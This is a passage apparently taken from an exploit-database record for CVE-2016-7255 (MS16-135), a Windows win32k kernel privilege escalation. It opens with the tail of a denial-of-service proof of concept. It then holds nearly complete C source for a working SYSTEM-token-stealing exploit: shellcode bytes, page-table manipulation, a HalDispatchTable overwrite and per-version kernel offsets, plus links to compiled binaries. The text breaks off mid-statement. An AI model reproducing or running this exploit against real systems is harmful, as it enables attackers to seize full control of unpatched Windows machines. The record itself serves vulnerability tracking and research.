pId = NULL; \nMSG stMsg = {0}; \n \ndo \n{ \n \nstWC.cbSize = sizeof(stWC); \nstWC.lpfnWndProc = DefWindowProcW; \nstWC.lpszClassName = pszClassName; \n \nif ( 0 == RegisterClassExW(&stWC) ) \n{ \nbreak; \n} \n \nhWndParent = CreateWindowExW( \n0, \npszClassName, \nNULL, \nWS_OVERLAPPEDWINDOW|WS_VISIBLE, \n0, \n0, \n360, \n360, \nNULL, \nNULL, \nGetModuleHandleW(NULL), \nNULL \n); \n \nif (NULL == hWndParent) \n{ \nbreak; \n} \n \nhWndChild = CreateWindowExW( \n0, \npszClassName, \npszTitleName, \nWS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD, \n0, \n0, \n160, \n160, \nhWndParent, \nNULL, \nGetModuleHandleW(NULL), \nNULL \n); \n \nif (NULL == hWndChild) \n{ \nbreak; \n} \n \n#ifdef _WIN64 \npId = ( (UCHAR*)pAddress - 0x28 ); \n#else \npId = ( (UCHAR*)pAddress - 0x14); \n#endif // #ifdef _WIN64 \n \nSetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId ); \n \nDbgPrint(\"hWndChild = 0x%p\\n\" , hWndChild); \nDebugBreak(); \n \nShowWindow(hWndParent , SW_SHOWNORMAL); \n \nSetParent(hWndChild , GetDesktopWindow() ); \n \nSetForegroundWindow(hWndChild); \n \n_sim_alt_shift_tab(4); \n \nSwitchToThisWindow(hWndChild , TRUE); \n \n_sim_alt_shift_esc(); \n \n \nwhile( GetMessage(&stMsg , NULL , 0 , 0) ) \n{ \nTranslateMessage(&stMsg); \nDispatchMessage(&stMsg); \n} \n \n \n} while (FALSE); \n \nif ( NULL != hWndParent ) \n{ \nDestroyWindow(hWndParent); \nhWndParent = NULL; \n} \n \nif ( NULL != hWndChild ) \n{ \nDestroyWindow(hWndChild); \nhWndChild = NULL; \n} \n \nUnregisterClassW(pszClassName , GetModuleHandleW(NULL) ); \n \nreturn 0; \n} \n \nint __cdecl wmain(int nArgc, WCHAR** Argv) \n{ \ndo \n{ \nor_address_value_4( (void*)0xFFFFFFFF ); \n} while (FALSE); \n \nreturn 0; \n} \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/139701/ms16135-dos.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:33", "description": "\nMicrosoft Windows Kernel - win32k.sys NtSetWindowLongPtr Local Privilege Escalation (MS16-135) (2)", "edition": 1, "published": "2017-01-08T00:00:00", "title": "Microsoft Windows Kernel - win32k.sys NtSetWindowLongPtr Local Privilege Escalation (MS16-135) (2)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7255"], "modified": "2017-01-08T00:00:00", "id": "EXPLOITPACK:3A596E79FE66F4077B2897D4B2D5D53B", "href": "", "sourceData": "/*\nSource: https://ricklarabee.blogspot.com/2017/01/virtual-memory-page-tables-and-one-bit.html\n\nBinary: https://github.com/rlarabee/exploits/raw/8b9eb646516d7f022a010f28018209f331c28975/cve-2016-7255/compiled/cve-2016-7255.exe\nMirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41015.exe\n*/\n\n// ricklarabee.blogspot.com\n\n//This program is free software; you can redistribute it and/or\n//modify it under the terms of the GNU General Public License\n//as published by the Free Software Foundation.\n\n//This program is distributed in the hope that it will be useful,\n//but WITHOUT ANY WARRANTY; without even the implied warranty of\n//MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the\n//GNU General Public License for more details.\n\n//You should have received a copy of the GNU General Public License\n//along with this program; if not, write to the Free Software\n//Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n\n// Credits: enrique.nissim@IOActive.com: https://github.com/IOActive/I-know-where-your-page-lives/tree/master/code/CVE-2016-7255\n// PoC from https://github.com/tinysec/public/tree/master/CVE-2016-7255\n\n#include <windows.h>\n#include <wchar.h>\n#include <stdlib.h>\n#include <stdio.h>\n\n#pragma comment(lib,\"ntdll.lib\")\n#pragma comment(lib,\"user32.lib\")\n#pragma comment(lib, \"advapi32\")\n\nUINT64 PML4_BASE;\nUINT PML4_SELF_REF_INDEX;\nUINT64 PML4_SELF_REF = 0xFFFFF6FB7DBEDF68;\n\n#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)\n#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L)\n#define GET_INDEX(va) ( ((va >> 39) & 0x1ff )) \n\n////////////////////////////////////////////////////////\n// Define Data Types\n////////////////////////////////////////////////////////\ntypedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {\n PVOID Unknown1;\n PVOID Unknown2;\n PVOID Base;\n ULONG Size;\n ULONG Flags;\n USHORT Index;\n USHORT NameLength;\n USHORT LoadCount;\n USHORT PathLength;\n CHAR ImageName[256];\n} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;\n\ntypedef struct _SYSTEM_MODULE_INFORMATION {\n ULONG Count;\n SYSTEM_MODULE_INFORMATION_ENTRY Module[1];\n} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;\n\ntypedef enum _SYSTEM_INFORMATION_CLASS { \n SystemModuleInformation = 11,\n SystemHandleInformation = 16\n} SYSTEM_INFORMATION_CLASS;\n\ntypedef NTSTATUS (WINAPI *NtQuerySystemInformation_t)(IN SYSTEM_INFORMATION_CLASS SystemInformationClass,\n OUT PVOID SystemInformation,\n IN ULONG SystemInformationLength,\n OUT PULONG ReturnLength);\n\ntypedef NTSTATUS (WINAPI *NtQueryIntervalProfile_t)(IN ULONG ProfileSource,\n\t\t\t\t\t\t\t\t\t\t\t\t\tOUT PULONG Interval);\n\nNtQuerySystemInformation_t NtQuerySystemInformation;\nNtQueryIntervalProfile_t NtQueryIntervalProfile;\n \nchar shellcode[] = {\n\t//0xcc,\n\t0xfa, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// CLI\n\t0x9c, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSHFQ\n\t0x48, 0xb8, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, \t// MOV RAX, Original Pointer\n\t0x50, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RAX\n\t0x51, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RCX\n\t0x48, 0xb9, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, \t// MOV RCX, [OverwriteAddr+OverwriteOffset]\n\t0x48, 0x89, 0x01, \t\t\t\t\t\t\t\t\t\t\t\t// MOV QWORD PTR [RCX], RAX\n\t0xb9, 0x90, 0x90, 0x90, 0x90, \t\t\t\t\t\t\t\t\t// MOV ECX, PID\n\t0x53, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RBX\n\n\t0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, \t\t\t// MOV RAX,QWORD PTR gs:0x188\n\t0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00,\t\t\t\t\t\t// MOV RAX,QWORD PTR [RAX+0xb8] EPROCESS\n\t0x48, 0x8d, 0x80, 0x90, 0x90, 0x00, 0x00,\t\t\t\t\t\t// LEA RAX,[RAX+0xActiveProcessLinkOffset] \n\t//<tag>\n\t0x48, 0x8b, 0x00,\t\t\t\t\t\t\t\t\t\t\t\t// MOV RAX,QWORD PTR [RAX]\n\t0x48, 0x8b, 0x58, 0xf8,\t\t\t\t\t\t\t\t\t\t\t// MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID\n\t0x48, 0x83, 0xfb, 0x04,\t\t\t\t\t\t\t\t\t\t\t// CMP RBX,0x4\n\t0x75, 0xf3,\t\t\t\t\t\t\t\t\t\t\t\t\t\t// JNE <tag>\n\t0x48, 0x8b, 0x98, 0x90, 0x90, 0x90, 0x90,\t\t\t\t\t\t// MOV RBX, QWORD PTR [RAX+0x60] // GET TOKEN of SYSTEM\n\n\t0x53, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RBX\n\t//<tag2>\n\t0x48, 0x8b, 0x00,\t\t\t\t\t\t\t\t\t\t\t\t// MOV RAX,QWORD PTR [RAX]\n\t0x48, 0x8b, 0x58, 0xf8,\t\t\t\t\t\t\t\t\t\t\t// MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID\n\t0x39, 0xcb,\t\t\t\t\t\t\t\t\t\t\t\t\t\t// CMP EBX, ECX // our PID\n\t0x75, 0xf5,\t\t\t\t\t\t\t\t\t\t\t\t\t\t// JNE <tag2>\n\t0x5b, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// POP RBX\n\t0x48, 0x89, 0x98, 0x90, 0x90, 0x90, 0x90,\t\t\t\t\t\t// MOV QWORD PTR[RAX + 0x60], RBX\n\n\t0x5b, // POP RBX\n\t0x59, // POP RCX\n\t0x58, // POP RAX\n\t0x9d, // POPFQ\n\n\t0xfb, // STI\n\t0xff, 0xe0 // JMP RAX\n};\n\nULONG __cdecl DbgPrint(__in char* Format, ...)\n{\n\tCHAR* pszDbgBuff = NULL;\n\tva_list VaList = NULL;\n\tULONG ulRet = 0;\n\n\tdo\n\t{\n\t\tpszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0, 1024 * sizeof(CHAR));\n\t\tif (NULL == pszDbgBuff)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t\tRtlZeroMemory(pszDbgBuff, 1024 * sizeof(CHAR));\n\n\t\tva_start(VaList, Format);\n\n\t\t_vsnprintf((CHAR*)pszDbgBuff, 1024 - 1, Format, VaList);\n\n\n\t\tOutputDebugStringA(pszDbgBuff);\n\n\t\tva_end(VaList);\n\n\t} while (FALSE);\n\n\tif (NULL != pszDbgBuff)\n\t{\n\t\tHeapFree(GetProcessHeap(), 0, pszDbgBuff);\n\t\tpszDbgBuff = NULL;\n\t}\n\n\treturn ulRet;\n}\n\n\nint _sim_key_down(WORD wKey)\n{\n\tINPUT stInput = { 0 };\n\n\tdo\n\t{\n\t\tstInput.type = INPUT_KEYBOARD;\n\t\tstInput.ki.wVk = wKey;\n\t\tstInput.ki.dwFlags = 0;\n\n\t\tSendInput(1, &stInput, sizeof(stInput));\n\n\t} while (FALSE);\n\n\treturn 0;\n}\n\nint _sim_key_up(WORD wKey)\n{\n\tINPUT stInput = { 0 };\n\n\tdo\n\t{\n\t\tstInput.type = INPUT_KEYBOARD;\n\t\tstInput.ki.wVk = wKey;\n\t\tstInput.ki.dwFlags = KEYEVENTF_KEYUP;\n\n\t\tSendInput(1, &stInput, sizeof(stInput));\n\n\t} while (FALSE);\n\n\treturn 0;\n}\n\nint _sim_alt_shift_esc()\n{\n\tint i = 0;\n\n\tdo\n\t{\n\t\t_sim_key_down(VK_MENU);\n\t\t_sim_key_down(VK_SHIFT);\n\n\n\t\t_sim_key_down(VK_ESCAPE);\n\t\t_sim_key_up(VK_ESCAPE);\n\n\t\t_sim_key_down(VK_ESCAPE);\n\t\t_sim_key_up(VK_ESCAPE);\n\n\t\t_sim_key_up(VK_MENU);\n\t\t_sim_key_up(VK_SHIFT);\n\n\n\t} while (FALSE);\n\n\treturn 0;\n}\n\n\n\nint _sim_alt_shift_tab(int nCount)\n{\n\tint i = 0;\n\tHWND hWnd = NULL;\n\n\n\tint nFinalRet = -1;\n\n\tdo\n\t{\n\t\t_sim_key_down(VK_MENU);\n\t\t_sim_key_down(VK_SHIFT);\n\n\n\t\tfor (i = 0; i < nCount; i++)\n\t\t{\n\t\t\t_sim_key_down(VK_TAB);\n\t\t\t_sim_key_up(VK_TAB);\n\n\t\t\tSleep(1000);\n\n\t\t}\n\n\n\t\t_sim_key_up(VK_MENU);\n\t\t_sim_key_up(VK_SHIFT);\n\t} while (FALSE);\n\n\treturn nFinalRet;\n}\n\nint _sim_alt_esc(int count)\n{\n\tint i = 0;\n\n\tfor (i = 0; i<count; i++)\n\t{\n\t\t_sim_key_down(VK_MENU);\n\t\t//_sim_key_down(VK_SHIFT);\n\n\n\t\t_sim_key_down(VK_ESCAPE);\n\t\t_sim_key_up(VK_ESCAPE);\n\n\t\t_sim_key_down(VK_ESCAPE);\n\t\t_sim_key_up(VK_ESCAPE);\n\n\t\t_sim_key_up(VK_MENU);\n\t\t//_sim_key_up(VK_SHIFT);\n\n\t}\n\n\treturn 0;\n}\n\n\nint or_address_value_4(__in void* pAddress)\n{\n\tWNDCLASSEXW stWC = { 0 };\n\n\tHWND hWndParent = NULL;\n\tHWND hWndChild = NULL;\n\n\tWCHAR* pszClassName = L\"cve-2016-7255\";\n\tWCHAR* pszTitleName = L\"cve-2016-7255\";\n\n\tvoid* pId = NULL;\n\tMSG stMsg = { 0 };\n\n\tUINT64 value = 0;\n\n\tdo\n\t{\n\n\t\tstWC.cbSize = sizeof(stWC);\n\t\tstWC.lpfnWndProc = DefWindowProcW;\n\t\tstWC.lpszClassName = pszClassName;\n\n\t\tif (0 == RegisterClassExW(&stWC))\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n\t\thWndParent = CreateWindowExW(\n\t\t\t0,\n\t\t\tpszClassName,\n\t\t\tNULL,\n\t\t\tWS_OVERLAPPEDWINDOW | WS_VISIBLE,\n\t\t\t0,\n\t\t\t0,\n\t\t\t360,\n\t\t\t360,\n\t\t\tNULL,\n\t\t\tNULL,\n\t\t\tGetModuleHandleW(NULL),\n\t\t\tNULL\n\t\t);\n\n\t\tif (NULL == hWndParent)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n\t\thWndChild = CreateWindowExW(\n\t\t\t0,\n\t\t\tpszClassName,\n\t\t\tpszTitleName,\n\t\t\tWS_OVERLAPPEDWINDOW | WS_VISIBLE | WS_CHILD,\n\t\t\t0,\n\t\t\t0,\n\t\t\t160,\n\t\t\t160,\n\t\t\thWndParent,\n\t\t\tNULL,\n\t\t\tGetModuleHandleW(NULL),\n\t\t\tNULL\n\t\t);\n\n\t\tif (NULL == hWndChild)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n#ifdef _WIN64\n\t\tpId = ((UCHAR*)pAddress - 0x28);\n#else\n\t\tpId = ((UCHAR*)pAddress - 0x14);\n#endif // #ifdef _WIN64\n\n\t\tSetWindowLongPtr(hWndChild, GWLP_ID, (LONG_PTR)pId);\n\n\t\tDbgPrint(\"hWndChild = 0x%p\\n\", hWndChild);\n\n\t\tShowWindow(hWndParent, SW_SHOWNORMAL);\n\n\t\tSetParent(hWndChild, GetDesktopWindow());\n\n\t\tSetForegroundWindow(hWndChild);\n\n\t\t_sim_alt_shift_tab(4);\n\n\t\tSwitchToThisWindow(hWndChild, TRUE);\n\n\t\t_sim_alt_shift_esc();\n\n\t\twhile (GetMessage(&stMsg, NULL, 0, 0)) {\n\t\t\t\n\t\t\tSetFocus(hWndParent);\n\t\t\t_sim_alt_esc(20);\n\t\t\tSetFocus(hWndChild);\n\t\t\t_sim_alt_esc(20);\n\n\t\t\tTranslateMessage(&stMsg);\n\t\t\tDispatchMessage(&stMsg);\n\t\t\t\n\t\t\tif (value != 0) {\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\t\n\n\t\t\t__try {\n\t\t\t\tvalue = *(UINT64 *)PML4_SELF_REF;\n\t\t\t\tif ((value & 0x67) == 0x67) {\n\t\t\t\t\tprintf(\"Value Self Ref = %llx\\n\", value);\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t}\n\t\t\t__except (EXCEPTION_EXECUTE_HANDLER) {\n\t\t\t\tcontinue;\n\t\t\t}\n\n\t\t}\n\n\n\t} while (FALSE);\n\n\tif (NULL != hWndParent)\n\t{\n\t\tDestroyWindow(hWndParent);\n\t\thWndParent = NULL;\n\t}\n\n\tif (NULL != hWndChild)\n\t{\n\t\tDestroyWindow(hWndChild);\n\t\thWndChild = NULL;\n\t}\n\n\tUnregisterClassW(pszClassName, GetModuleHandleW(NULL));\n\n\treturn 0;\n}\n\nUINT64 get_pxe_address(UINT64 address) {\n\tUINT entry = PML4_SELF_REF_INDEX;\n\tUINT64 result = address >> 9;\n\tUINT64 lower_boundary = ((UINT64)0xFFFF << 48) | ((UINT64)entry << 39);\n\tUINT64 upper_boundary = (((UINT64)0xFFFF << 48) | ((UINT64)entry << 39) + 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8;\n\tresult = result | lower_boundary;\n\tresult = result & upper_boundary;\n\treturn result;\n}\n\nUINT64 look_free_entry_pml4(void) {\n\t// Looks for a free pml4e in the last 0x100 bytes of the PML4\n\tint offset = 0xF00;\n\tUINT64 pml4_search = PML4_BASE + offset;\n\twhile (offset < 0xFF8)\n\t{\n\t\tif ((*(PVOID *)pml4_search) == 0x0)\n\t\t{\n\t\t\t// This is a NULL (free) entry\n\t\t\tbreak;\n\t\t}\n\t\toffset += 8;\n\t\tpml4_search = PML4_BASE + offset;\n\t}\n\treturn pml4_search;\n}\n\nUINT64 calculate_spurious_pt_address(UINT64 spurious_offset) {\n\tUINT64 index = (spurious_offset & 0xFFF) / 8;\n\tUINT64 result = (\n\t\t((UINT64)0xFFFF << 48) |\n\t\t((UINT64)PML4_SELF_REF_INDEX << 39) |\n\t\t((UINT64)PML4_SELF_REF_INDEX << 30) |\n\t\t((UINT64)PML4_SELF_REF_INDEX << 21) |\n\t\t(index << 12)\n\t\t);\n\treturn result;\n}\n\n\n\nUINT64 create_spurious_pte_to_virtual_address(UINT64 virtual_address, BOOL patch_original) {\n\n\t/*\n\t1: kd> !pte ffffffff`ffd00000\n\tVA ffffffffffd00000\n\tPXE at FFFFF6FB7DBEDFF8 PPE at FFFFF6FB7DBFFFF8 PDE at FFFFF6FB7FFFFFF0 PTE at FFFFF6FFFFFFE800\n\tcontains 0000000000A1F063 contains 0000000000A20063 contains 0000000000A25063 contains 8000000000103963\n\tpfn a1f-- - DA--KWEV pfn a20-- - DA--KWEV pfn a25-- - DA--KWEV pfn 103 - G - DA--KW - V\n\t*/\t\n\n\tUINT64 pte = get_pxe_address(virtual_address);\n\tint pte_offset = pte & 0xFFF;\n\t//printf(\"PTE: %llx, %x\\n\", pte, pte_offset);\n\t\n\tUINT64 pde = get_pxe_address(pte);\n\tint pde_offset = pde & 0xFFF;\n\t//printf(\"PDE: %llx, %x\\n\", pde, pde_offset);\n\t\t\n\tUINT64 pdpte = get_pxe_address(pde);\n\tint pdpte_offset = pdpte & 0xFFF;\n\t//printf(\"PDPTE: %llx,%x\\n\", pdpte, pdpte_offset);\n\t\t\n\tUINT64 pml4e = get_pxe_address(pdpte);\n\tint pml4e_offset = pml4e & 0xFFF;\n\t//printf(\"PML4E: %llx\\n\", pml4e, pml4e_offset);\n\t\n\tUINT64 spurious_offset = look_free_entry_pml4();\n\tprintf(\"[+] Selected spurious PML4E: %llx\\n\", spurious_offset);\n\tUINT64 f_e_pml4 = spurious_offset;\n\tUINT64 spurious_pt = calculate_spurious_pt_address(spurious_offset);\n\tprintf(\"[+] Spurious PT: %llx\\n\", spurious_pt);\n\tprintf(\"--------------------------------------------------\\n\\n\");\n\t\n\t\n\t//Read the physical address of pml4e\t\n\tUINT64 pml4e_pfn = (UINT64)(*(PVOID *)pml4e);\n\tprintf(\"[+] Content pml4e %llx: %llx\\n\", pml4e, pml4e_pfn);\n\t// Change the PxE\n\tpml4e_pfn = pml4e_pfn | 0x67; // Set U/S\n\t\n\tprintf(\"[+] Patching the Spurious Offset (PML4e) %llx: %llx\\n\",f_e_pml4, pml4e_pfn);\n\t*((PVOID *)spurious_offset) = (PVOID)pml4e_pfn;\n\tSleep(0x1); // Sleep for TLB refresh;\n\t\n\t//Read the physical address of pdpte\n\tUINT64 pdpte_pfn = (UINT64) *(PVOID *)(spurious_pt + pdpte_offset);\n\tprintf(\"[+] Content pdpte %llx: %llx\\n\", pdpte, pdpte_pfn);\n\t// Change the PxE\n\tpdpte_pfn = pdpte_pfn | 0x67; // Set U/S\n\tprintf(\"[+] Patching the Spurious Offset (PDPTE) %llx: %llx\\n\", spurious_offset, pdpte_pfn);\n\t*((PVOID *)spurious_offset) = (PVOID)pdpte_pfn;\n\tSleep(0x1); // Sleep for TLB refresh;\n\t\n\t//Read the physical address of pde\n\tUINT64 pde_addr = spurious_pt + pde_offset;\n\tUINT64 pde_pfn = (UINT64) *(PVOID *)(spurious_pt + pde_offset);\n\tprintf(\"[+] Content pdpe %llx: %llx\\n\", pde, pde_pfn);\n\t// Change the PxE\n\tpde_pfn = pde_pfn | 0x67; // Set U/S\n\tprintf(\"[+] Patching the Spurious Offset (PDE) %llx: %llx\\n\", spurious_offset, pde_pfn);\n\t*((PVOID *)spurious_offset) = (PVOID)pde_pfn;\n\tSleep(0x1); // Sleep for TLB refresh;\n\t\n\t//Read the physical address of pte\n\tUINT64 pte_addr = spurious_pt + pte_offset;\n\tUINT64 pte_pfn = (UINT64) *(PVOID *)(spurious_pt + pte_offset);\n\tprintf(\"[+] Content pte %llx: %llx\\n\", pte, pte_pfn);\n\t// Change the PxE\n\tpte_pfn = pte_pfn | 0x67; // Set U/S\n pte_pfn = pte_pfn & 0x7fffffffffffffff; // Turn off NX \n\tif (patch_original) {\n\t\tprintf(\"*** Patching the original location to enable NX...\\n\");\n\t\t*(PVOID *)(spurious_pt + pte_offset) = (PVOID)pte_pfn;\n\t}\n \n\tprintf(\"[+] Patching the Spurious Offset (PTE) %llx: %llx\\n\", spurious_offset, pte_pfn);\n\t*((PVOID *)spurious_offset) = (PVOID)pte_pfn;\n\tSleep(0x1); // Sleep for TLB refresh;\n\tprintf(\"\\n\\n\");\n\treturn spurious_pt;\n}\n\nUINT64 get_OverwriteAddress_pointer(UINT64 target_address, int target_offset) {\n\tprintf(\"[*] Getting Overwrite pointer: %llx\\n\", target_address);\n\tUINT64 OverwriteAddress = create_spurious_pte_to_virtual_address(target_address, FALSE);\n\tOverwriteAddress += (target_address & 0xFFF);\n\tprintf(\"OverwriteAddress: %llx\\n\", OverwriteAddress);\n\treturn (UINT64) *((PVOID *)(((char *)OverwriteAddress) + target_offset));\n}\n\nvoid overwrite_TargetAddress(UINT64 hook_address, UINT64 target_address, int target_offset) {\n\tUINT64 OverwriteTarget = create_spurious_pte_to_virtual_address(target_address, FALSE);\n\tOverwriteTarget += (target_address & 0xFFF);\n\tUINT64 target = (UINT64)((char *)OverwriteTarget) + target_offset;\n\tprintf(\"Patch OverwriteTarget: %llx with %llx\\n\", target, hook_address);\n\t*(PVOID *)target = (PVOID)hook_address;\n}\n\n\nUINT64 store_shellcode_in_hal(void) {\n\t//// Finally store the shellcode on the HAL\n\n\tUINT64 hal_heap_addr = 0xFFFFFFFFFFD00000;\n\tUINT64 hal_heap = create_spurious_pte_to_virtual_address(hal_heap_addr, TRUE);\n\n\tprintf(\"HAL address: %llx\\n\", hal_heap);\n\t// 0xffffffffffd00d50 this is a good offset to store shellcode \n\t// 0xfff - 0xd50 = 0x2af space\n\n\tmemcpy(((char *)hal_heap) + 0xd50, shellcode, sizeof(shellcode));\n\treturn 0xffffffffffd00d50;\n}\n\nUINT64 GetHalDispatchTable() {\n PCHAR KernelImage;\n SIZE_T ReturnLength;\n HMODULE hNtDll = NULL;\n UINT64 HalDispatchTable;\n HMODULE hKernelInUserMode = NULL;\n PVOID KernelBaseAddressInKernelMode;\n NTSTATUS NtStatus = STATUS_UNSUCCESSFUL;\n PSYSTEM_MODULE_INFORMATION pSystemModuleInformation;\n\n hNtDll = LoadLibrary(\"ntdll.dll\");\n\n if (!hNtDll) {\n printf(\"\\t\\t\\t[-] Failed To Load NtDll.dll: 0x%X\\n\", GetLastError());\n exit(EXIT_FAILURE);\n }\n\n NtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(hNtDll, \"NtQuerySystemInformation\");\n\n if (!NtQuerySystemInformation) {\n printf(\"\\t\\t\\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\\n\", GetLastError());\n exit(EXIT_FAILURE);\n }\n\n NtStatus = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &ReturnLength);\n\n // Allocate the Heap chunk\n pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(),\n HEAP_ZERO_MEMORY,\n ReturnLength);\n\n if (!pSystemModuleInformation) {\n printf(\"\\t\\t\\t[-] Memory Allocation Failed For SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError());\n exit(EXIT_FAILURE);\n }\n NtStatus = NtQuerySystemInformation(SystemModuleInformation,\n pSystemModuleInformation,\n ReturnLength,\n &ReturnLength);\n\n if (NtStatus != STATUS_SUCCESS) {\n printf(\"\\t\\t\\t[-] Failed To Get SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError());\n exit(EXIT_FAILURE);\n }\n\n KernelBaseAddressInKernelMode = pSystemModuleInformation->Module[0].Base;\n KernelImage = strrchr((PCHAR)(pSystemModuleInformation->Module[0].ImageName), '\\\\') + 1;\n\n printf(\"\\t\\t\\t[+] Loaded Kernel: %s\\n\", KernelImage);\n printf(\"\\t\\t\\t[+] Kernel Base Address: 0x%p\\n\", KernelBaseAddressInKernelMode);\n \n hKernelInUserMode = LoadLibraryA(KernelImage);\n\n if (!hKernelInUserMode) {\n printf(\"\\t\\t\\t[-] Failed To Load Kernel: 0x%X\\n\", GetLastError());\n exit(EXIT_FAILURE);\n }\n\n // This is still in user mode\n HalDispatchTable = (UINT64)GetProcAddress(hKernelInUserMode, \"HalDispatchTable\");\n\n if (!HalDispatchTable) {\n printf(\"\\t\\t\\t[-] Failed Resolving HalDispatchTable: 0x%X\\n\", GetLastError());\n exit(EXIT_FAILURE);\n }\n else {\n HalDispatchTable = (ULONGLONG)HalDispatchTable - (ULONGLONG)hKernelInUserMode;\n\n // Here we get the address of HapDispatchTable in Kernel mode\n HalDispatchTable = ((ULONGLONG)HalDispatchTable + (ULONGLONG)KernelBaseAddressInKernelMode);\n printf(\"\\t\\t\\t[+] HalDispatchTable: 0x%llx\\n\", HalDispatchTable);\n }\n\n HeapFree(GetProcessHeap(), 0, (LPVOID)pSystemModuleInformation);\n\n if (hNtDll) {\n FreeLibrary(hNtDll);\n }\n\n if (hKernelInUserMode) {\n FreeLibrary(hKernelInUserMode);\n }\n\n hNtDll = NULL;\n hKernelInUserMode = NULL;\n pSystemModuleInformation = NULL;\n\n return HalDispatchTable;\n}\n\nint __cdecl main(int argc, char** argv)\n{\n\tTCHAR pre_username[256];\n\tTCHAR post_username[256];\n\tDWORD size = 256;\n\tULONG Interval = 0;\n\tHMODULE hNtDll = NULL;\n\tUINT retval;\n UINT64 overwrite_address;\n int overwrite_offset;\n \n // define operating system version specific variables\n unsigned char sc_KPROCESS;\n unsigned int sc_TOKEN;\n unsigned int sc_APLINKS;\n\tint osversion;\n\n\tif (argc != 2) {\n\t\tprintf(\"Please enter an OS version\\n\");\n\t\tprintf(\"The following OS'es are supported:\\n\");\n\t\tprintf(\"\\t[*] 7 - Windows 7\\n\");\n\t\tprintf(\"\\t[*] 81 - Windows 8.1\\n\");\n\t\tprintf(\"\\t[*] 10 - Windows 10 prior to build release 14393 (Anniversary Update)\\n\");\n\t\tprintf(\"\\t[*] 12 - Windows 2012 R2\\n\");\n\t\tprintf(\"\\n\");\n\t\tprintf(\"\\t[*] For example: cve-2016-7255.exe 7 -- for Windows 7\\n\");\n\t\treturn -1;\n\t}\n\t\n\tosversion = _strtoui64(argv[1], NULL, 10);\n\t\n if(osversion == 7) \n {\n // the target machine's OS is Windows 7 SP1\n printf(\" [+] Windows 7 SP1\\n\");\n sc_KPROCESS = 0x70;\t\t\t// dt -r1 nt!_KTHREAD +0x050 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\n sc_TOKEN = 0x80;\t\t\t// dt -r1 nt!_EPROCESS [+0x208 Token : _EX_FAST_REF] - [+0x188 ActiveProcessLinks : _LIST_ENTRY] = (0x80)\n sc_APLINKS = 0x188;\t\t// dt -r1 nt!_EPROCESS +0x188 ActiveProcessLinks : _LIST_ENTRY\n \n overwrite_address = GetHalDispatchTable(); // HalDispatchTable\n overwrite_offset = 0x8; \t\t\t\t// QueryIntervalProfile \n }\n\telse if(osversion == 81)\n {\n // the target machine's OS is Windows 8.1\n printf(\" [+] Windows 8.1\\n\");\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\n sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\n sc_APLINKS = 0x2e8; \t// dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY\n \n overwrite_address = 0xffffffffffd00510; // HalpInterruptController_address (dq poi(hal!HalpInterruptController))\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\n }\n\telse if(osversion == 10)\n {\n // the target machine's OS is Windows 10 prior to build 14393\n printf(\" [+] Windows 10\\n\");\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\n sc_TOKEN = 0x68; // dt -r1 nt!_EPROCESS [+0x358 Token : _EX_FAST_REF] - [+0x2f0 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\n sc_APLINKS = 0x2f0; // dt -r1 nt!_EPROCESS +0x2f0 ActiveProcessLinks : _LIST_ENTRY\n \n overwrite_address = 0xffffffffffd004c0; 